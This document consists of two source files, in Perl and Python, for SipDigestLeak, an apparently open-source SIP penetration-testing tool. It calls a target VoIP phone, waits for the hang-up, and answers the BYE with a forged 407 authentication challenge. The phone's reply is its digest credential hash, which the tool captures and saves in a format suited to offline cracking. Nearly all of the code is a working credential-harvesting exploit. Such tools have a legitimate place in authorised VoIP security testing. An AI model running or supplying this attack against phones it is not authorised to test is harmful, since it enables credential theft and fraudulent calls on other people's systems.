File: sipdigestleak.pl
#!/usr/bin/perl
# -=-=-=-=-=-=-
# SipDigestLeak
# -=-=-=-=-=-=-
#
# Copyright (C) 2015-2019 Jose Luis Verdeguer <pepeluxx@gmail.com>
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.

use warnings;
use strict;
use IO::Socket;
use IO::Socket::Timeout;
use NetAddr::IP;
use Getopt::Long;
use Digest::MD5 qw(md5 md5_hex md5_base64);
use Net::Address::IP::Local;

my $ipaddr    = Net::Address::IP::Local->public;
my $useragent = 'pplsip';

my $host       = '';        # host
my $lport      = '5070';    # local port
my $dport      = '5060';    # destination port
my $fromuser   = '100';     # From User
my $fromname   = '';        # From Name
my $touser     = '100';     # To User
my $v          = 0;         # verbose mode
my $from_ip    = '';
my $totag      = "";
my $cseq       = "1";
my $bye_branch = "";
my $sd         = "";
my $ver        = 0;

sub init() {

  # check params
  my $result = GetOptions(
    "h=s"      => \$host,
    "fu=s"     => \$fromuser,
    "fn=s"     => \$fromname,
    "tu=s"     => \$touser,
    "l=s"      => \$lport,
    "r=s"      => \$dport,
    "ua=s"     => \$useragent,
    "sd=s"     => \$sd,
    "version+" => \$ver,
    "v+"       => \$v
  );

  check_version() if ( $ver eq 1 );
  help()          if ( $host eq "" );

  $from_ip = $ipaddr if ( $from_ip eq "" );

  my $callid = &generate_random_string( 32, 1 );
  my $sc     = new IO::Socket::INET->new( PeerPort => $dport, LocalPort => $lport, Proto => 'udp', PeerAddr => $host, Timeout => 10 );

  if ($sc) {
    IO::Socket::Timeout->enable_timeouts_on($sc);
    $sc->read_timeout(60);
    $sc->enable_timeout;
    $lport = $sc->sockport() if ( $lport eq "" );

    # send INVITE
    if ( $v eq 0 ) { print "[+] Connecting to $host:$dport\n"; }
    my $res = send_invite( $sc, $from_ip, $host, $lport, $dport, $fromuser, $fromname, $touser, $callid );

    # Call is attended. Wait the hung up
    if ( $res =~ /^200/ ) {
      send_ack( $sc, $from_ip, $host, $lport, $dport, $fromuser, $touser, $callid );
      wait_bye($sc);
      send_error( $sc, $from_ip, $host, $lport, $dport, $fromuser, $touser, $callid, $cseq );
    }
  }

  exit;
}

# Send INVITE message
sub send_invite {
  my $sc       = shift;
  my $from_ip  = shift;
  my $host     = shift;
  my $lport    = shift;
  my $dport    = shift;
  my $from     = shift;
  my $fromname = shift;
  my $to       = shift;
  my $callid   = shift;

  my $branch = &generate_random_string( 71, 0 );

  my $msg = "INVITE sip:" . $to . "@" . $host . ":" . $dport . " SIP/2.0\r\n";
  $msg .= "Via: SIP/2.0/UDP $from_ip:$lport;branch=$branch\r\n";
  $msg .= "From: $fromname <sip:" . $from . "@" . $host . ">;tag=0c26cd11\r\n";
  $msg .= "To: <sip:" . $to . "@" . $host . ">\r\n";
  $msg .= "Contact: <sip:" . $from . "@" . $from_ip . ":$lport;transport=udp>\r\n";
  $msg .= "Call-ID: " . $callid . "\r\n";
  $msg .= "CSeq: 1 INVITE\r\n";
  $msg .= "User-Agent: $useragent\r\n";
  $msg .= "Max-Forwards: 70\r\n";
  $msg .= "Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE,UPDATE,PRACK,MESSAGE\r\n";
  $msg .= "Content-Length: 0\r\n\r\n";

  print $sc $msg;

  if   ( $v eq 0 ) { print "[+] Sending INVITE $fromuser => $touser\n"; }
  else             { print "Sending:\n=======\n$msg"; }

  my $data     = "";
  my $response = "";
  my $line     = "";

LOOP: {
    while (<$sc>) {
      $line = $_;

      if ( $line =~ /^SIP\/2.0/ ) {
        $line =~ /^SIP\/2.0\s(.+)\r\n/;
        if ($1) { $response = $1; }
      }

      if ( $line =~ /^To/i && $line =~ /;tag/i ) {
        $line =~ /;tag=(.+)\r\n/;
        $totag = $1 if ($1);
      }

      $data .= $line;

      if ( $line =~ /^\r\n/ ) {
        if   ( $v eq 0 ) { print "[-] $response\n"; }
        else             { print "Receiving:\n=========\n$data"; }

        last LOOP if ( $response !~ /^1/ );

        $data     = "";
        $response = "";
      }
    }
  }

  return $response;
}

# Send ACK message
sub send_ack {
  my $sc      = shift;
  my $from_ip = shift;
  my $host    = shift;
  my $lport   = shift;
  my $dport   = shift;
  my $from    = shift;
  my $to      = shift;
  my $callid  = shift;

  my $branch = &generate_random_string( 71, 0 );

  my $msg = "ACK sip:" . $to . "@" . $host . ":" . $dport . " SIP/2.0\r\n";
  $msg .= "Via: SIP/2.0/UDP $from_ip:$lport;branch=$branch\r\n";
  $msg .= "From: <sip:" . $from . "@" . $host . ">;tag=0c26cd11\r\n";
  $msg .= "To: <sip:" . $to . "@" . $host . ">;tag=$totag\r\n";
  $msg .= "Call-ID: " . $callid . "\r\n";
  $msg .= "CSeq: 1 ACK\r\n";
  $msg .= "Contact: <sip:" . $from . "@" . $from_ip . ":$lport;transport=udp>\r\n";
  $msg .= "User-Agent: $useragent\r\n";
  $msg .= "Max-Forwards: 70\r\n";
  $msg .= "Allow: INVITE,ACK,CANCEL,BYE,NOTIFY,REFER,OPTIONS,INFO,SUBSCRIBE,UPDATE,PRACK,MESSAGE\r\n";
  $msg .= "Content-Length: 0\r\n\r\n";

  print $sc $msg;

  if   ( $v eq 0 ) { print "[+] Sending ACK\n"; }
  else             { print "Sending:\n=======\n$msg"; }
}

# Wait BYE
sub wait_bye {
  my $sc = shift;

  my $data     = "";
  my $response = "";
  my $line     = "";
  my $bye      = 0;
  my $auth     = "";
  my $resp     = "";
  my $user     = "";
  my $uri      = "";
  my $cnonce   = "";
  my $nc       = "";
  my $qop      = "";
  my $realm  = "asterisk";
  my $nonce  = &generate_random_string( 8, 0 );

  if ( $v eq 0 ) { print "[+] Waiting for the BYE message\n"; }

LOOP: {
    while (<$sc>) {
      $line = $_;

      if ( $line =~ /^SIP\/2.0/ || $line =~ /^BYE/i ) {
        $line =~ /^SIP\/2.0\s(.+)\r\n/;
        if ($1) { $response = $1; }
        $bye = 1 if ( $line =~ /^BYE/i );
      }

      if ( $line =~ /CSeq/i ) {
        $line =~ /CSeq\:\s(.+)\r\n/i;

        $cseq = $1 if ($1);
      }

      if ( $line =~ /^Via/i && $line =~ /;branch/i ) {
        $line =~ /;branch=(.+)\r\n/;
        $bye_branch = $1 if ($1);
      }

      # If is not the first try, maybe auth is received in the first BYE
      if ( $line =~ /Authorization/i ) {
        $line =~ /Authorization\:\s(.+)\r\n/i;
        $auth = $1 if ($1);

        $auth =~ /username\=\"([a-z|A-Z|0-9|-|_]+)\"/i;
        $user = $1 if ($1);

        $auth =~ /uri\=\"([a-z|A-Z|0-9|-|_|\.|\:|\;|\=|\@|\#]+)\"/i;
        $uri = $1 if ($1);

        $auth =~ /response\=\"(.+)\"/i;
        $resp = $1 if ($1);

        if ( $auth =~ /cnonce\=\"[\w\+\/]+\"/i ) {
          $auth =~ /cnonce\=\"([\w\+\/]+)\"/i;
          $cnonce = $1 if ($1);
        }
        else {
          $cnonce = "";
        }

        if ( $auth =~ /nc\=\"*[\w\+]+\"*/i ) {
          $auth =~ /nc\=\"*([\w\+]+)\"*/i;
          $nc = $1 if ($1);
        }
        else {
          $nc = "";
        }

        if ( $auth =~ /qop\=\"*[\w\+]+\"*/i ) {
          $auth =~ /qop\=\"*([\w\+]+)\"*/i;
          $qop = $1 if ($1);
        }
        else {
          $qop = "";
        }
      }

      $data .= $line;

      if ( $line =~ /^\r\n/ ) {
        if ( $auth ne "" && $sd ne "" ) {
          my $res = "$host\"$from_ip\"$user\"$realm\"BYE\"$uri\"$nonce\"$cnonce\"$nc\"$qop\"MD5\"$resp";
          open( my $fh, '>>', $sd ) or die "Could not open file '$sd' $!";
          print $fh "$res\n";
          close $fh;
          print "Data saved in file: $sd\n";
          exit;
        }

        if ( $bye eq 1 ) {
          if   ( $v eq 0 ) { print "[-] BYE received\n"; }
          else             { print "Receiving:\n=========\n$data"; }

          last LOOP;
        }

        $data     = "";
        $response = "";
      }
    }
  }
}

# Send 407 response error
sub send_error {
  my $sc      = shift;
  my $from_ip = shift;
  my $host    = shift;
  my $lport   = shift;
  my $dport   = shift;
  my $from    = shift;
  my $to      = shift;
  my $callid  = shift;
  my $csec    = shift;

  my $branch = $bye_branch;
  my $realm  = "asterisk";
  my $nonce  = &generate_random_string( 8, 0 );
  my $digest = "WWW-Authenticate: Digest algorithm=MD5, realm=\"$realm\", nonce=\"$nonce\"";

  my $msg = "SIP/2.0 407 Proxy Authentication Required\r\n";
  $msg .= "Via: SIP/2.0/UDP $host:$dport;branch=$branch\r\n";
  $msg .= "From: <sip:" . $to . "@" . $host . ":" . $dport . ">;tag=" . $totag . "\r\n";
  $msg .= "To: <sip:" . $from . "@" . $from_ip . ":" . $lport . ">;tag=0c26cd11\r\n";
  $msg .= "Call-ID: " . $callid . "\r\n";
  $msg .= "CSeq: $csec\r\n";
  $msg .= "$digest\r\n";
  $msg .= "Content-Length: 0\r\n\r\n";

  print $sc $msg;

  if   ( $v eq 0 ) { print "[+] Sending 407 Proxy Authentication Required\n"; }
  else             { print "Sending:\n=======\n$msg"; }

  my $data     = "";
  my $response = "";
  my $line     = "";
  my $auth     = "";
  my $resp     = "";
  my $user     = "";
  my $uri      = "";
  my $cnonce   = "";
  my $nc       = "";
  my $qop      = "";

LOOP: {
    while (<$sc>) {
      $line = $_;

      if ( $line =~ /^SIP\/2.0/ && ( $response eq "" || $response =~ /^1/ ) ) {
        $line =~ /^SIP\/2.0\s(.+)\r\n/;
        if ($1) { $response = $1; }
      }

      if ( $line =~ /Authorization/i ) {
        $line =~ /Authorization\:\s(.+)\r\n/i;
        $auth = $1 if ($1);

        $auth =~ /username\=\"([a-z|A-Z|0-9|-|_]+)\"/i;
        $user = $1 if ($1);

        $auth =~ /uri\=\"([a-z|A-Z|0-9|-|_|\.|\:|\;|\=|\@|\#]+)\"/i;
        $uri = $1 if ($1);

        $auth =~ /response\=\"(.+)\"/i;
        $resp = $1 if ($1);

        if ( $auth =~ /cnonce\=\"[\w\+\/]+\"/i ) {
          $auth =~ /cnonce\=\"([\w\+\/]+)\"/i;
          $cnonce = $1 if ($1);
        }
        else {
          $cnonce = "";
        }

        if ( $auth =~ /nc\=\"*[\w\+]+\"*/i ) {
          $auth =~ /nc\=\"*([\w\+]+)\"*/i;
          $nc = $1 if ($1);
        }
        else {
          $nc = "";
        }

        if ( $auth =~ /qop\=\"*[\w\+]+\"*/i ) {
          $auth =~ /qop\=\"*([\w\+]+)\"*/i;
          $qop = $1 if ($1);
        }
        else {
          $qop = "";
        }
      }

      $data .= $line;

      if ( $line =~ /^\r\n/ ) {
        if   ( $v eq 0 ) { print "[-] Auth: $auth\n"; }
        else             { print "Receiving:\n=========\n$data"; }

        if ( $auth ne "" && $sd ne "" ) {
          my $res = "$host\"$from_ip\"$user\"$realm\"BYE\"$uri\"$nonce\"$cnonce\"$nc\"$qop\"MD5\"$resp";
          open( my $fh, '>>', $sd ) or die "Could not open file '$sd' $!";
          print $fh "$res\n";
          close $fh;
          print "Data saved in file: $sd\n";
        }

        last LOOP if ( $response !~ /^1/ );

        $data     = "";
        $response = "";
      }
    }
  }

  return $response;
}

# Generate a random string
sub generate_random_string {
  my $length_of_randomstring = shift;
  my $only_hex               = shift;
  my @chars;

  if ( $only_hex == 0 ) {
    @chars = ( 'a' .. 'z', '0' .. '9' );
  }
  else {
    @chars = ( 'a' .. 'f', '0' .. '9' );
  }

  my $random_string;

  foreach ( 1 .. $length_of_randomstring ) {
    $random_string .= $chars[ rand @chars ];
  }

  return $random_string;
}

sub check_version {
  my $version     = '';
  my $versionfile = 'version';
  open( my $fh, '<:encoding(UTF-8)', $versionfile )
    or die "Could not open file '$versionfile' $!";

  while ( my $row = <$fh> ) {
    chomp $row;
    $version = $row;
  }

  my $v = `curl -s https://raw.githubusercontent.com/Pepelux/sippts/master/version`;
  $v =~ s/\n//g;

  if ( $v ne $version ) {
    print "The current version ($version) is outdated. There is a new version ($v). Please update:\n";
    print "https://github.com/Pepelux/sippts\n";
  }
  else {
    print "The current version ($version) is latest.\n";
  }

  exit;
}

sub help {
  print qq{
SipDigestLeak - by Pepelux <pepeluxx\@gmail.com>
-------------
Wiki: https://github.com/Pepelux/sippts/wiki/SIPDigestLeak

Usage: perl $0 -h <host> [options]
 
== Options ==
-fu  <string>    = From User (by default 100)
-fn  <string>    = From Name
-tu  <string>    = To User (by default 100)
-l  <integer>    = Local port (default: 5070)
-r  <integer>    = Remote port (default: 5060)
-ua <string>     = Customize the UserAgent
-sd <filename>   = Save data in a format SIPDump file
-v               = Verbose (trace information)
-version         = Show version and search for updates
 
== Examples ==
\$ perl $0 -h 192.168.0.1
\$ perl $0 -h 192.168.0.1 -r 5080 -v
\$ perl $0 -h 192.168.0.1 -sd data.txt
\$ perl $0 -h 192.168.0.1 -fu 666666666 -fn Devil
 
};

  exit 1;
}

init();

File: modules/sipdigestleak.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'Jose Luis Verdeguer'
__version__ = '3.0.0'
__license__ = "GPL"
__copyright__ = "Copyright (C) 2015-2022, SIPPTS"
__email__ = "pepeluxx@gmail.com"

import socket
import sys
import ssl
import ipaddress
import re
from tabnanny import verbose
from lib.functions import create_message, create_response_error, create_response_ok, parse_message, parse_digest, generate_random_string, get_machine_default_ip, ip2long, get_free_port, calculateHash

BRED = '\033[1;31;40m'
RED = '\033[0;31;40m'
BRED_BLACK = '\033[1;30;41m'
RED_BLACK = '\033[0;30;41m'
BGREEN = '\033[1;32;40m'
GREEN = '\033[0;32;40m'
BGREEN_BLACK = '\033[1;30;42m'
GREEN_BLACK = '\033[0;30;42m'
BYELLOW = '\033[1;33;40m'
YELLOW = '\033[0;33;40m'
BBLUE = '\033[1;34;40m'
BLUE = '\033[0;34;40m'
BMAGENTA = '\033[1;35;40m'
MAGENTA = '\033[0;35;40m'
BCYAN = '\033[1;36;40m'
CYAN = '\033[0;36;40m'
BWHITE = '\033[1;37;40m'
WHITE = '\033[0;37;40m'


class SipDigestLeak:
    def __init__(self):
        self.ip = ''
        self.rport = '5060'
        self.proto = 'UDP'
        self.domain = ''
        self.contact_domain = ''
        self.from_user = '100'
        self.from_name = ''
        self.from_domain = ''
        self.to_user = '100'
        self.to_name = ''
        self.to_domain = ''
        self.user_agent = 'pplsip'
        self.ofile = ''
        self.user = ''
        self.pwd = ''
        self.verbose = 0

    def start(self):
        supported_protos = ['UDP', 'TCP', 'TLS']

        self.proto = self.proto.upper()

        # check protocol
        if self.proto not in supported_protos:
            print(BRED + 'Protocol %s is not supported' % self.proto)
            sys.exit()

        # if rport is by default but we want to scan TLS protocol, use port 5061
        if self.rport == 5060 and self.proto == 'TLS':
            self.rport = 5061

        print(BWHITE + '[!] Target: ' + GREEN + '%s:%s/%s' %
              (self.ip, self.rport, self.proto))
        print(BWHITE + '[!] Caller: ' + GREEN + '%s' % self.from_user)
        print(BWHITE + '[!] Callee: ' + GREEN + '%s' % self.to_user)
        print(WHITE)

        self.call(self.ip, self.rport, self.proto)

    def call(self, ip, port, proto):
        cseq = '1'

        # my IP address
        local_ip = get_machine_default_ip()

        # SIP headers
        if self.domain == '':
            self.domain = ip
        if self.from_domain == '':
            self.from_domain = ip
        if self.to_domain == '':
            self.to_domain = ip
        if self.contact_domain == '':
            self.contact_domain = local_ip

        try:
            if self.proto == 'UDP':
                sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            else:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        except socket.error:
            print(RED+'Failed to create socket')
            sys.exit(1)

        bind = '0.0.0.0'
        lport = 5060

        try:
            sock.bind((bind, lport))
        except:
            lport = get_free_port()
            sock.bind((bind, lport))

        host = (str(ip), int(port))

        branch = generate_random_string(71, 71, 'ascii')
        callid = generate_random_string(32, 32, 'hex')
        tag = generate_random_string(8, 8, 'hex')

        msg = create_message('INVITE', self.contact_domain, self.from_user, self.from_name, self.from_domain,
                             self.to_user, self.to_name, self.to_domain, proto, self.domain, self.user_agent, lport, branch, callid, tag, cseq, '', '', 1, '', 0, '', '')

        print(YELLOW + '[=>] Request INVITE' + WHITE)

        if self.verbose == 1:
            print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                  (self.ip, self.rport, self.proto))
            print(YELLOW + msg + WHITE)

        try:
            sock.settimeout(15)

            # send INVITE
            if proto == 'TCP':
                sock.connect(host)

            if self.proto == 'TLS':
                sock_ssl = ssl.wrap_socket(
                    sock, ssl_version=ssl.PROTOCOL_TLS, ciphers=None, cert_reqs=ssl.CERT_NONE)
                sock_ssl.connect(host)
                sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
            else:
                sock.sendto(bytes(msg[:8192], 'utf-8'), host)

            rescode = '100'

            while rescode[:1] == '1':
                # receive temporary code
                if self.proto == 'TLS':
                    resp = sock_ssl.recv(4096)
                else:
                    resp = sock.recv(4096)

                headers = parse_message(resp.decode())

                if headers:
                    via = headers['via']
                    rr = headers['rr']

                    response = '%s %s' % (
                        headers['response_code'], headers['response_text'])
                    rescode = headers['response_code']
                    print(CYAN + '[<=] Response %s' % response)

                    totag = headers['totag']

                if self.verbose == 1:
                    print(BWHITE + '[+] Receiving from %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(GREEN + resp.decode() + WHITE)

            if self.user != '' and self.pwd != '' and (headers['response_code'] == '401' or headers['response_code'] == '407'):
                # send ACK
                print(YELLOW + '[+] Request ACK')
                msg = create_message('ACK', self.contact_domain, self.from_user, self.from_name, self.from_domain,
                                     self.to_user, self.to_name, self.to_domain, proto, self.domain, self.user_agent, lport, branch, callid, tag, cseq, totag, '', 1, '', 0, via, rr)

                if self.verbose == 1:
                    print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(YELLOW + msg + WHITE)

                if self.proto == 'TLS':
                    sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
                else:
                    sock.sendto(bytes(msg[:8192], 'utf-8'), host)

                if headers['auth'] != '':
                    auth = headers['auth']
                    auth_type = headers['auth-type']
                    headers = parse_digest(auth)
                    realm = headers['realm']
                    nonce = headers['nonce']
                    uri = 'sip:%s@%s' % (self.to_user, self.domain)
                    algorithm = headers['algorithm']
                    cnonce = headers['cnonce']
                    nc = headers['nc']
                    qop = headers['qop']

                    if qop != '' and cnonce == '':
                        cnonce = generate_random_string(8, 8, 'ascii')
                    if qop != '' and nc == '':
                        nc = '00000001'

                    response = calculateHash(
                        self.user, realm, self.pwd, 'INVITE', uri, nonce, algorithm, cnonce, nc, qop, 0, '')

                    digest = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s", algorithm=%s' % (
                        self.user, realm, nonce, uri, response, algorithm)
                    if qop != '':
                        digest += ', qop=%s' % qop
                    if cnonce != '':
                        digest += ', cnonce="%s"' % cnonce
                    if nc != '':
                        digest += ', nc=%s' % nc

                    branch = generate_random_string(71, 71, 'ascii')
                    cseq = str(int(cseq) + 1)

                    print(YELLOW + '[=>] Request INVITE' + WHITE)

                    msg = create_message('INVITE', self.contact_domain, self.from_user, self.from_name, self.from_domain, self.to_user, self.to_name, self.to_domain, self.proto,
                                         self.domain, self.user_agent, lport, branch, callid, tag, cseq, '', digest, auth_type, '', 0, via, '')

                    if self.verbose == 1:
                        print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                              (self.ip, self.rport, self.proto))
                        print(YELLOW + msg + WHITE)

                    try:
                        if self.proto == 'TLS':
                            sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
                        else:
                            sock.sendto(bytes(msg[:8192], 'utf-8'), host)

                        rescode = '100'

                        while rescode[:1] == '1':
                            # receive temporary code
                            if self.proto == 'TLS':
                                resp = sock_ssl.recv(4096)
                            else:
                                resp = sock.recv(4096)

                            headers = parse_message(resp.decode())

                            if headers:
                                rr = headers['rr']

                                response = '%s %s' % (
                                    headers['response_code'], headers['response_text'])
                                rescode = headers['response_code']

                                print(CYAN + '[<=] Response %s' % response)
                                if self.verbose == 1:
                                    print(BWHITE + '[+] Receiving from %s:%s/%s ...' %
                                          (self.ip, self.rport, self.proto))
                                    print(GREEN + resp.decode() + WHITE)
                    except:
                        print(WHITE)

            # receive 200 Ok - call answered
            if headers['response_code'] == '200':
                cuser = headers['contactuser']
                cdomain = headers['contactdomain']
                if cdomain == '':
                    cdomain = self.domain
                else:
                    if cuser != None and cuser != '':
                        cdomain = cuser + '@' + cdomain

                totag = headers['totag']

                # send ACK
                print(YELLOW + '[=>] Request ACK')

                msg = create_message('ACK', self.contact_domain, self.from_user, self.from_name, self.from_domain,
                                     self.to_user, self.to_name, self.to_domain, proto, cdomain, self.user_agent, lport, branch, callid, tag, cseq, totag, digest, auth_type, '', 0, via, rr)

                if self.verbose == 1:
                    print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(YELLOW + msg + WHITE)

                if self.proto == 'TLS':
                    sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
                else:
                    sock.sendto(bytes(msg[:8192], 'utf-8'), host)

                # wait for BYE
                bye = False
                while bye == False:
                    print(WHITE + '\t... waiting for BYE ...')

                    if self.proto == 'TLS':
                        resp = sock_ssl.recv(4096)
                    else:
                        resp = sock.recv(4096)

                    if resp.decode()[0:3] == 'BYE':
                        bye = True
                        print(CYAN + '[<=] Received BYE')
                        headers = parse_message(resp.decode())
                        branch = headers['branch']
                        cseq = headers['cseq']
                        via = headers['via']
                    else:
                        print(CYAN + '[<=] Response %s' % response)

                    if self.verbose == 1:
                        print(BWHITE + '[+] Receiving from %s:%s/%s ...' %
                              (self.ip, self.rport, self.proto))
                        print(GREEN + resp.decode() + WHITE)

                # send 407 with digest
                cseq = int(cseq) + 1
                msg = create_response_error('407 Proxy Authentication Required', self.from_user,
                                            self.to_user, proto, self.domain, lport, cseq, 'BYE', branch, callid, tag, totag, local_ip, via)

                print(
                    YELLOW + '[=>] Request 407 Proxy Authentication Required')

                if self.verbose == 1:
                    print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(YELLOW + msg + WHITE)

                if self.proto == 'TLS':
                    sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
                else:
                    sock.sendto(bytes(msg[:8192], 'utf-8'), host)

                # receive auth BYE
                if self.proto == 'TLS':
                    resp = sock_ssl.recv(4096)
                else:
                    resp = sock.recv(4096)

                print(CYAN + '[<=] Received BYE')

                if self.verbose == 1:
                    print(BWHITE + '[+] Receiving from %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(GREEN + resp.decode() + WHITE)

                headers = parse_message(resp.decode())
                branch = headers['branch']

                try:
                    auth = headers['auth']
                except:
                    auth = ''

                # send 200 OK
                msg = create_response_ok(
                    self.from_user, self.to_user, proto, self.domain, lport, cseq, branch, callid, tag, totag)

                print(YELLOW + '[=>] Request 200 Ok\n')

                if self.verbose == 1:
                    print(BWHITE + '[+] Sending to %s:%s/%s ...' %
                          (self.ip, self.rport, self.proto))
                    print(YELLOW + msg + WHITE)

                if self.proto == 'TLS':
                    sock_ssl.sendall(bytes(msg[:8192], 'utf-8'))
                else:
                    sock.sendto(bytes(msg[:8192], 'utf-8'), host)

                if auth != '':
                    print(BGREEN + 'Auth=%s\n' % auth + WHITE)

                    headers = parse_digest(auth)

                    if self.ofile != '':
                        data = '%s"%s"%s"%s"BYE"%s"%s"%s"%s"%s"MD5"%s' % (
                            ip, local_ip, headers['username'], headers['realm'], headers['uri'], headers['nonce'], headers['cnonce'], headers['nc'], headers['qop'], headers['response'])

                        f = open(self.ofile, 'w')
                        f.write(data)
                        f.close()

                        print(WHITE+'Auth data saved in file %s' % self.ofile)
                else:
                    print(BRED + 'No Auth Digest received :(\n' + WHITE)
        except socket.timeout:
            pass
        except:
            pass
        finally:
            sock.close()

        return
